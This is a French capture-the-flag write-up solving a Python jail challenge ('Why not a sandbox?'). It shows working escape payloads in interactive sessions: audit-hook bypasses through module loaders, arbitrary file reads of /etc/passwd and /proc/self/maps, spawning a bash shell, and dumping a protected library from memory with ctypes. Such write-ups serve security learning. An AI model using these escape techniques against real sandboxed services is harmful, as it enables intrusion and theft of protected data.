Why not a sandbox? (pwn, 500)
Description du challenge
1
Votre but est d'appeler la fonction print_flag pour afficher le flag.
2
3
Service : nc challenges1.france-cybersecurity-challenge.fr 4005
Copied!
Solution
On se connecte au service et on est accueilli avec ce qui a tout l'air d'être un shell Python :
1
$ nc challenges1.france-cybersecurity-challenge.fr 4005
2
Arriverez-vous à appeler la fonction print_flag ?
3
Python 3.8.2 (default, Apr 1 2020, 15:52:55)
4
[GCC 9.3.0] on linux
5
>>> print_flag
6
Traceback (most recent call last):
7
File "<stdin>", line 1, in <module>
8
NameError: name 'print_flag' is not defined
Copied!
A partir de ce moment, je me dis que c'est une Python jail classique et j'essaie un peu tous les payloads usuels. L'importation semble être autorisée, mais sur un nombre restreint de modules :
1
>>> import binascii
2
Exception ignored in audit hook:
3
Exception: Action interdite
4
Exception: Module non autorisé
5
Traceback (most recent call last):
6
File "<stdin>", line 1, in <module>
7
Exception: Action interdite
Copied!
En farfouillant un peu toutefois à l'aide de
dir(), on arrive à importer les modules builtins que l'on veut :1
>>> L = __loader__.load_module
2
>>> L('binascii')
3
<module 'binascii' (built-in)>
Copied!
La fonction
open existe, mais on dirait que d'un hook empêche de l'utiliser :1
>>> open('a')
2
Traceback (most recent call last):
3
File "<stdin>", line 1, in <module>
4
Exception: Action interdite
Copied!
Cependant, toujours en tatonnant, on trouve une fonction
open dans le module codecs qui fonctionne. Génial.1
>>> open = L('codecs').open
2
>>> open('/etc/passwd', 'r').read()
3
'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/bin/false\nctf-init:x:1000:1000::/home/ctf-init:\nctf:x:1001:1001::/home/ctf:\n'
Copied!
On peut maintenant lire des fichiers arbitraires sur le serveur... on essaie quelques noms du style
server.py ou chall.py, mais rien de probant. Essayons de lire /proc/self/maps :1
55b298700000-55b298701000 r--p 00000000 09:03 14549288 /app/spython
2
55b298701000-55b298702000 r-xp 00001000 09:03 14549288 /app/spython
3
55b298702000-55b298703000 r--p 00002000 09:03 14549288 /app/spython
4
55b298703000-55b298704000 r--p 00002000 09:03 14549288 /app/spython
5
55b298704000-55b298705000 rw-p 00003000 09:03 14549288 /app/spython
6
55b299a56000-55b299b3b000 rw-p 00000000 00:00 0 [heap]
7
7f5b9551d000-7f5b9559d000 rw-p 00000000 00:00 0
8
7f5b955dd000-7f5b9569d000 rw-p 00000000 00:00 0
9
7f5b956b8000-7f5b9581d000 rw-p 00000000 00:00 0
10
7f5b9581d000-7f5b95824000 r--s 00000000 09:03 14555684 /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache
11
7f5b95824000-7f5b95856000 r--p 00000000 09:03 14554819 /usr/lib/locale/C.UTF-8/LC_CTYPE
12
7f5b95856000-7f5b95858000 rw-p 00000000 00:00 0
13
7f5b95858000-7f5b95867000 r--p 00000000 09:03 14549531 /lib/x86_64-linux-gnu/libm-2.30.so
14
7f5b95867000-7f5b95902000 r-xp 0000f000 09:03 14549531 /lib/x86_64-linux-gnu/libm-2.30.so
15
7f5b95902000-7f5b9599b000 r--p 000aa000 09:03 14549531 /lib/x86_64-linux-gnu/libm-2.30.so
16
7f5b9599b000-7f5b9599c000 r--p 00142000 09:03 14549531 /lib/x86_64-linux-gnu/libm-2.30.so
17
7f5b9599c000-7f5b9599d000 rw-p 00143000 09:03 14549531 /lib/x86_64-linux-gnu/libm-2.30.so
18
7f5b9599d000-7f5b9599e000 r--p 00000000 09:03 14550555 /lib/x86_64-linux-gnu/libutil-2.30.so
19
7f5b9599e000-7f5b9599f000 r-xp 00001000 09:03 14550555 /lib/x86_64-linux-gnu/libutil-2.30.so
20
7f5b9599f000-7f5b959a0000 r--p 00002000 09:03 14550555 /lib/x86_64-linux-gnu/libutil-2.30.so
21
7f5b959a0000-7f5b959a1000 r--p 00002000 09:03 14550555 /lib/x86_64-linux-gnu/libutil-2.30.so
22
7f5b959a1000-7f5b959a2000 rw-p 00003000 09:03 14550555 /lib/x86_64-linux-gnu/libutil-2.30.so
23
7f5b959a2000-7f5b959a3000 r--p 00000000 09:03 14549446 /lib/x86_64-linux-gnu/libdl-2.30.so
24
7f5b959a3000-7f5b959a4000 r-xp 00001000 09:03 14549446 /lib/x86_64-linux-gnu/libdl-2.30.so
25
7f5b959a4000-7f5b959a5000 r--p 00002000 09:03 14549446 /lib/x86_64-linux-gnu/libdl-2.30.so
26
7f5b959a5000-7f5b959a6000 r--p 00002000 09:03 14549446 /lib/x86_64-linux-gnu/libdl-2.30.so
27
7f5b959a6000-7f5b959a7000 rw-p 00003000 09:03 14549446 /lib/x86_64-linux-gnu/libdl-2.30.so
28
7f5b959a7000-7f5b959a9000 rw-p 00000000 00:00 0
29
7f5b959a9000-7f5b959b0000 r--p 00000000 09:03 14550538 /lib/x86_64-linux-gnu/libpthread-2.30.so
30
7f5b959b0000-7f5b959bf000 r-xp 00007000 09:03 14550538 /lib/x86_64-linux-gnu/libpthread-2.30.so
31
7f5b959bf000-7f5b959c4000 r--p 00016000 09:03 14550538 /lib/x86_64-linux-gnu/libpthread-2.30.so
32
7f5b959c4000-7f5b959c5000 r--p 0001a000 09:03 14550538 /lib/x86_64-linux-gnu/libpthread-2.30.so
33
7f5b959c5000-7f5b959c6000 rw-p 0001b000 09:03 14550538 /lib/x86_64-linux-gnu/libpthread-2.30.so
34
7f5b959c6000-7f5b959ca000 rw-p 00000000 00:00 0
35
7f5b959ca000-7f5b959e3000 r-xp 00000000 09:03 6689755 /lib/x86_64-linux-gnu/libz.so.1.2.8
36
7f5b959e3000-7f5b95be2000 ---p 00019000 09:03 6689755 /lib/x86_64-linux-gnu/libz.so.1.2.8
37
7f5b95be2000-7f5b95be3000 r--p 00018000 09:03 6689755 /lib/x86_64-linux-gnu/libz.so.1.2.8
38
7f5b95be3000-7f5b95be4000 rw-p 00019000 09:03 6689755 /lib/x86_64-linux-gnu/libz.so.1.2.8
39
7f5b95be4000-7f5b95be8000 r--p 00000000 09:03 14549470 /lib/x86_64-linux-gnu/libexpat.so.1.6.11
40
7f5b95be8000-7f5b95c03000 r-xp 00004000 09:03 14549470 /lib/x86_64-linux-gnu/libexpat.so.1.6.11
41
7f5b95c03000-7f5b95c0d000 r--p 0001f000 09:03 14549470 /lib/x86_64-linux-gnu/libexpat.so.1.6.11
42
7f5b95c0d000-7f5b95c0e000 ---p 00029000 09:03 14549470 /lib/x86_64-linux-gnu/libexpat.so.1.6.11
43
7f5b95c0e000-7f5b95c10000 r--p 00029000 09:03 14549470 /lib/x86_64-linux-gnu/libexpat.so.1.6.11
44
7f5b95c10000-7f5b95c11000 rw-p 0002b000 09:03 14549470 /lib/x86_64-linux-gnu/libexpat.so.1.6.11
45
7f5b95c11000-7f5b95c36000 r--p 00000000 09:03 14549378 /lib/x86_64-linux-gnu/libc-2.30.so
46
7f5b95c36000-7f5b95d80000 r-xp 00025000 09:03 14549378 /lib/x86_64-linux-gnu/libc-2.30.so
47
7f5b95d80000-7f5b95dca000 r--p 0016f000 09:03 14549378 /lib/x86_64-linux-gnu/libc-2.30.so
48
7f5b95dca000-7f5b95dcd000 r--p 001b8000 09:03 14549378 /lib/x86_64-linux-gnu/libc-2.30.so
49
7f5b95dcd000-7f5b95dd0000 rw-p 001bb000 09:03 14549378 /lib/x86_64-linux-gnu/libc-2.30.so
50
7f5b95dd0000-7f5b95dd4000 rw-p 00000000 00:00 0
51
7f5b95dd4000-7f5b95dd5000 r--p 00000000 09:03 14549270 /app/lib_flag.so
52
7f5b95dd5000-7f5b95dd6000 r-xp 00001000 09:03 14549270 /app/lib_flag.so
53
7f5b95dd6000-7f5b95dd7000 r--p 00002000 09:03 14549270 /app/lib_flag.so
54
7f5b95dd7000-7f5b95dd8000 r--p 00002000 09:03 14549270 /app/lib_flag.so
55
7f5b95dd8000-7f5b95dd9000 rw-p 00003000 09:03 14549270 /app/lib_flag.so
56
7f5b95dd9000-7f5b95e4a000 r--p 00000000 09:03 14555712 /usr/lib/x86_64-linux-gnu/libpython3.8.so.1.0
57
7f5b95e4a000-7f5b9609e000 r-xp 00071000 09:03 14555712 /usr/lib/x86_64-linux-gnu/libpython3.8.so.1.0
58
7f5b9609e000-7f5b962b7000 r--p 002c5000 09:03 14555712 /usr/lib/x86_64-linux-gnu/libpython3.8.so.1.0
59
7f5b962b7000-7f5b962bd000 r--p 004dd000 09:03 14555712 /usr/lib/x86_64-linux-gnu/libpython3.8.so.1.0
60
7f5b962bd000-7f5b96304000 rw-p 004e3000 09:03 14555712 /usr/lib/x86_64-linux-gnu/libpython3.8.so.1.0
61
7f5b96304000-7f5b96329000 rw-p 00000000 00:00 0
62
7f5b9632b000-7f5b9632c000 r--p 00000000 09:03 14549310 /lib/x86_64-linux-gnu/ld-2.30.so
63
7f5b9632c000-7f5b9634a000 r-xp 00001000 09:03 14549310 /lib/x86_64-linux-gnu/ld-2.30.so
64
7f5b9634a000-7f5b96352000 r--p 0001f000 09:03 14549310 /lib/x86_64-linux-gnu/ld-2.30.so
65
7f5b96353000-7f5b96354000 r--p 00027000 09:03 14549310 /lib/x86_64-linux-gnu/ld-2.30.so
66
7f5b96354000-7f5b96355000 rw-p 00028000 09:03 14549310 /lib/x86_64-linux-gnu/ld-2.30.so
67
7f5b96355000-7f5b96356000 rw-p 00000000 00:00 0
68
7ffe9728e000-7ffe972af000 rw-p 00000000 00:00 0 [stack]
69
7ffe9735c000-7ffe9735f000 r--p 00000000 00:00 0 [vvar]
70
7ffe9735f000-7ffe97361000 r-xp 00000000 00:00 0 [vdso]
71
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Copied!
Fantastique : il semblerait que le serveur soit en fait lancé par un binaire nommé
/app/spython, et on remarque aussi l'existence d'un fichier très intéressant nommé /app/lib_flag.so. Probablement la fonction print_flag tant recherchée se trouve à l'intérieur !On dump le binaire
spython, par exemple en l'encodant en hexadécimal et en le rapatriant sur sa machine à l'aide d'un habile copier-coller :1
tohex = L('binascii').hexlify
2
tohex(open('spython', 'rb').read())
Copied!
On l'analyse avec Ghidra. Le binaire utilise l'API CPython et semble utiliser une mécanique de hooks pour bloquer certaines opérations, mais je ne connais pas le fonctionnement plus en détail et je n'ai pas réussi à comprendre exactement tout le fonctionnement du binaire. Heureusement ce n'est pas très important pour réussir l'épreuve.
On remarque la fonction
welcome qui affiche le message du début : ce symbole n'existe pas dans le binaire, il provient certainement de la fameuse lib_flag.so.Essayons d'ailleurs de lire ce fichier :
1
>>> open('lib_flag.so', 'rb')
2
Traceback (most recent call last):
3
File "<stdin>", line 1, in <module>
4
File "/usr/lib/python3.8/codecs.py", line 905, in open
5
file = builtins.open(filename, mode, buffering)
6
PermissionError: [Errno 13] Permission denied: 'lib_flag.so'
Copied!
Mince... A ce moment-là je me suis dit que j'allais continuer à traiter l'épreuve comme une jail classique, et j'ai trouvé le moyen d'importer
os et d'obtenir un shell. Spoiler alert, ce shell ne sert à rien pour la résolution.1
>>> sys = L('sys')
2
>>> os = sys.meta_path[2].find_module('os').load_module('os')
3
>>> shell = lambda: os.execl('/bin/bash','/bin/bash')
4
>>> shell()
5
bash: cannot set terminal process group (15810): Inappropriate ioctl for device
6
bash: no job control in this shell
7
[email protected]:/app$ ls -la
8
total 40
9
drwxr-xr-x 1 root root 4096 Apr 25 20:58 .
10
drwxr-xr-x 1 root root 4096 Apr 25 20:59 ..
11
-r-------- 1 ctf-init ctf 16064 Apr 25 20:58 lib_flag.so
12
-r-sr-x--- 1 ctf-init ctf 14904 Apr 25 20:58 spython
Copied!
Voici donc la source de tous nos problèmes : seul ctf-init peut lire
lib_flag.so.Cette deuxième partie de l'épreuve fut la plus difficile. Il faudrait soit trouver un moyen d'appeler
print_flag depuis le shell Python, soit trouver un moyen de lire directement le contenu de lib_flag.so.Après beaucoup d'essais infructueux, la solution m'est finalement apparue en m'inspirant de la toute fin de ce writeup : https://germano.dev/fuckpyjails/
Avec le module
ctypes, on peut aller fouiller la mémoire du processus. En plus, on a le mapping mémoire grâce à /proc/self/maps, et en particulier les adresses des pages de là où est chargée libc_flag.so : c'est gagné.1
7f5b95dd4000-7f5b95dd5000 r--p 00000000 09:03 14549270 /app/lib_flag.so
2
7f5b95dd5000-7f5b95dd6000 r-xp 00001000 09:03 14549270 /app/lib_flag.so
3
7f5b95dd6000-7f5b95dd7000 r--p 00002000 09:03 14549270 /app/lib_flag.so
4
7f5b95dd7000-7f5b95dd8000 r--p 00002000 09:03 14549270 /app/lib_flag.so
5
7f5b95dd8000-7f5b95dd9000 rw-p 00003000 09:03 14549270 /app/lib_flag.so
Copied!
Voici un exemple de lecture en mémoire :
1
>>> from ctypes import *
2
>>> OP = POINTER(c_char)
3
>>> s = "salut"
4
>>> s.__repr__ # address leak
5
<method-wrapper '__repr__' of str object at 0x7ffa315740f0>
6
>>> cast(0x7ffa315740f0, OP).contents
7
c_char(b'\x01')
Copied!
Bon, le "salut" apparaît en réalité quelques dizaines d'octets plus tard, parce que la structure des objets string est plus complexe que ça (voir https://rushter.com/blog/python-strings-and-memory/).
Écrivons maintenant une fonction très utile qui nous permettra de dump la mémoire sur un nombre d'octets donné :
1
mem = lambda addr, sz: b''.join(cast(addr+i, POINTER(c_char)).contents for i in range(sz))
Copied!
Je passe les détails du dump des pages associées à
lib_flag.so, toutes les adresses sont données, j'encode en hexa le total et je rapatrie sur ma machine.On obtient un ELF mais il semble corrompu. En l'examinant, j'ai l'impression qu'une page (4096 octets) a été dupliquée pour une raison que je ne connais pas. En l'enlevant, ça fonctionne, et on fait chauffer Ghidra :
Un petit coup de CyberChef et c'est plié.
Une épreuve très fun qui m'aura appris un tas de choses, fait lire beaucoup de doc, et qui avec du recul n'est pas si tirée par les cheveux. J'adore !
Last modified 2yr ago
Copy link